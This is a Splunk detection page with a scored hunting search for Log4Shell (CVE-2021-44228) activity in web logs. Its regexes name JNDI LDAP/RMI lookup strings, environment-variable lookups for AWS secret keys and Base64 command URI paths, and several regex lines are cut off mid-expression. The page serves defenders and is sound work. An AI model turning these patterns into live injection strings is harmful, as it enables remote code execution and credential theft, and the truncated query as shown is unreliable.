Try in Splunk Security Cloud


The following hunting query assists with quickly assessing CVE-2021-44228, or Log4Shell, activity mapped to the Web Datamodel. This is a combination query attempting to identify, score and dashboard. Because the Log4Shell vulnerability requires the string to be in the logs, this will work to identify the activity anywhere in the HTTP headers using _raw. Modify the first line to use the same pattern matching against other log sources. Scoring is based on a simple rubric of 0-5. 5 being the best match, and less than 5 meant to identify additional patterns that will equate to a higher total score.
The first jndi match identifies the standard pattern of {jndi:
jndi_fastmatch is meant to identify any jndi in the logs. The score is set low and is meant to be the "base" score used later.
jndi_proto is a protocol match that identifies jndi and one of ldap, ldaps, rmi, dns, nis, iiop, corba, nds, http, https.
all_match is a very well written regex by that identifies nearly all patterns of this attack behavior.
env works to identify environment variables in the header, meant to capture AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and env.
uri_detect is string match looking for the common uri paths currently being scanned/abused in the wild.
keywords matches on enumerated values that, like $ctx:loginId, that may be found in the header used by the adversary.
lookup matching is meant to catch some basic obfuscation that has been identified using upper, lower and date.
Scoring will then occur based on any findings. The base score is meant to be 2 , created by jndi_fastmatch. Everything else is meant to increase that score.
Finally, a simple table is created to show the scoring and the _raw field. Sort based on score or columns of interest.

  • Type: Hunting
  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Web
  • Last Updated: 2021-12-14
  • Author: Michael Haag, Splunk
  • ID: 158b68fa-5d1a-11ec-aac8-acde48001122


ID Technique Tactic
T1190 Exploit Public-Facing Application Initial Access

| from datamodel Web.Web 
| eval jndi=if(match(_raw, "(\{
| eval jndi_fastmatch=if(match(_raw, "[jJnNdDiI]{4}"),2,0) 
| eval jndi_proto=if(match(_raw,"(?i)jndi:(ldap[s]?
| eval all_match = if(match(_raw, "(?i)(%(25){0,}20
| eval env_var = if(match(_raw, "env:") OR match(_raw, "env:AWS_ACCESS_KEY_ID") OR match(_raw, "env:AWS_SECRET_ACCESS_KEY"),5,0) 
| eval uridetect = if(match(_raw, "(?i)Basic\/Command\/Base64
| eval keywords = if(match(_raw,"(?i)\$\{ctx\:loginId\}
| eval obf = if(match(_raw, "(\$
|%24)[^ /]*({
|%7b)[^ /]*(j
|%6a)[^ /]*(n
|%6e)[^ /]*(d
|%64)[^ /]*(i
|%69)[^ /]*(:
|%3a)[^ /]*(:
|%3a)[^ /]*(/
| eval lookups = if(match(_raw, "(?i)({
| addtotals fieldname=Score, jndi, jndi_proto, env_var, uridetect, all_match, jndi_fastmatch, keywords, obf, lookups 
| where Score > 2 
| stats values(Score) by  jndi, jndi_proto, env_var, uridetect, all_match, jndi_fastmatch, keywords, lookups, obf, _raw 
| `hunting_for_log4shell_filter`

Associated Analytic Story

How To Implement

Out of the box, the Web datamodel is required to be pre-filled. However, tested was performed against raw httpd access logs. Change the first line to any dataset to pass the regex's against.

Required field

  • _time
  • Web.http_method
  • Web.url
  • Web.url_length
  • Web.src
  • Web.dest
  • Web.http_user_agent
  • _raw

Kill Chain Phase

  • Exploitation

Known False Positives

It is highly possible you will find false positives, however, the base score is set to 2 for any jndi found in raw logs. tune and change as needed, include any filtering.


Risk Score Impact Confidence Message
40.0 80 50 Hunting for Log4Shell exploitation has occurred.


ID Summary CVSS
CVE-2021-44228 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. 9.3


Test Dataset

Replay any dataset to Splunk Enterprise by using our tool or the UI. Alternatively you can replay a dataset into a Splunk Attack Range

source | version: 1